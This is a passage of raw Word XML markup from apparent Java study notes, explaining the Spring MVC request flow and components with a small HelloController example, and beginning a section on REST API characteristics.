          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ModelAndView</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E232A7F" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1765"/>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ViewResolver</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> maps the logical view name to the actual view (e.g., JSP, Thymeleaf)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36221AFD" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1765"/>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The </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>View</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is rendered and returned to the client as an HTTP response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55721A79" w14:textId="77777777" w:rsidR="003158C2"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5029C52">
          <v:rect id="_x0000_i1941" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="156E8780" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2"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Spring MVC Compon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6"/>
        <w:gridCol w:w="5683"/>
      </w:tblGrid>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="01803623" w14:textId="77777777" w:rsidTr="003158C2">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4C50F06C" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2" w:rsidP="001B573F">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="58243E8B" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2" w:rsidP="001B573F">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001B573F">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="009B01A7" w14:textId="77777777" w:rsidTr="003158C2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2EA995D0"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DispatcherServlet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3AE50FC6"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Front Controller — handles all requests &amp; coordinates the flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="419CF5FF" w14:textId="77777777" w:rsidTr="003158C2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="559B0FE0"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Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38BCE4A9"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Contains request-handling logic (annotated with @Controller)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="2CF2235C" w14:textId="77777777" w:rsidTr="003158C2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3D95FFDE"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Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3E85C562"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Contains application data (shared with the View)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="7B2C4FEF" w14:textId="77777777" w:rsidTr="003158C2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="60434355"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View</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0F7AF597"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Renders the output (JSP, Thymeleaf, etc.)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="44537F7A" w14:textId="77777777" w:rsidTr="003158C2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6E0378DC"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HandlerMapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="164085A3"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Maps URL to appropriate Controller</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001B573F" w:rsidRPr="001B573F" w14:paraId="3C5D615E" w14:textId="77777777" w:rsidTr="003158C2">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="524E4D2D"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ViewResolver</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20F399BB"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Resolves logical view names to actual view files</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="656D2318" w14:textId="77777777" w:rsidR="003158C2"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033BCAB">
          <v:rect id="_x0000_i1942" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E848A8" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2"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Conceptual Diagram</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38380EF4"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Client</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A269C6"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C0C78B"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DispatcherServlet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB3E793"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC7E890"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HandlerMapping → Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C31C763"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CBAEA19"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Model + View Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B37F58"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762950FF"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ViewResolver</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A15348F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8E1769"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View</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0824D93C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08AE8E38"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Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B92AF65" w14:textId="77777777" w:rsidR="003158C2"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BD9E5E2">
          <v:rect id="_x0000_i1943" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="355F803F" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2"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Advantages of Spring MVC:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC7C076" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1766"/>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Loose coupling (MVC separation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292F44F6" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1766"/>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Annotations like @Controller, @GetMapping, etc., simplify config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15755FE5" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1766"/>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Easy integration with REST APIs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EC9574" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1766"/>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Supports form validation, i18n, exception handling, and more</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="592E64FF" w14:textId="77777777" w:rsidR="003158C2"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154C905">
          <v:rect id="_x0000_i1944" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E56D04" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>💡</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73941F3F"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Controller</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147FAA34"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public class HelloController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B1392D"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GetMapping("/hello")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EB343D"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public String sayHello(Model model) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3FC72D"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model.addAttribute("msg", "Hello, Siddhant!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC8E57A"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return "welcome"; // Resolved by ViewResolver to welcome.jsp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12182621" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="001B573F" w:rsidRDefault="003158C2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437B8B4B" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="00CE4B95" w:rsidRDefault="003158C2" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="759B84C6" w14:textId="77777777" w:rsidR="003158C2" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="003158C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CB0AE50">
          <v:rect id="_x0000_i1945" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDEEE54" w14:textId="5F32460E" w:rsidR="009E74CB" w:rsidRPr="00CE4B95" w:rsidRDefault="0096470A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="394" w:name="_Toc196307874"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the REST API</w:t>
      </w:r>
      <w:r w:rsidR="009E74CB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="394"/>
    </w:p>
    <w:p w14:paraId="7302D71A" w14:textId="237C9BC4" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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REST API (Representational State Transfer API)</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a set of conventions for building web services that allow clients to interact with resources using standard HTTP methods like </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>PUT</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>DELETE</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F02EFCA" w14:textId="77777777" w:rsidR="009376C7"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4BF4B33">
          <v:rect id="_x0000_i1946" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EB5EF3A" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Key Characteristics of REST:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A74B8D" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1767"/>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Stateless</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Each request from a client to the server must contain all the information needed to understand and process the request. The server does not store any session information between requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="010A4501" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1767"/>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lastRenderedPageBreak/>
        <w:t>Client-Server Architecture</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: REST APIs separate the client and the server, which allows for independent development. The client sends requests and the server responds with resources.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0205F69B" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1767"/>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Uniform Interface</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: REST APIs use a consistent set of conventions for accessing resources (e.g., standard HTTP methods, URIs).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D2577A" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1767"/>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Resource-Based</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Resources (data or services) are identified using </w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>URIs (Uniform Resource Identifiers)</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. A resource can be any object, data, or service that can be accessed via an HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5572A704" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1767"/>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Representation of Resources</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When a client requests a resource, the server sends a representation of that resource (e.g., JSON, XML) as the response.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A7E1ED1" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1767"/>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Cacheable</w:t>
      </w:r>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Responses should explicitly define whether they can be cached for reuse in subsequent requests, improving performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43711403" w14:textId="77777777" w:rsidR="009376C7"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B4C191">
          <v:rect id="_x0000_i1947" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="641999FE" w14:textId="77777777" w:rsidR="009376C7" w:rsidRPr="001B573F" w:rsidRDefault="009376C7" w:rsidP="001B573F">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001B573F">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HTTP Methods in REST:</w:t>
      </w:r>
    </w:p>
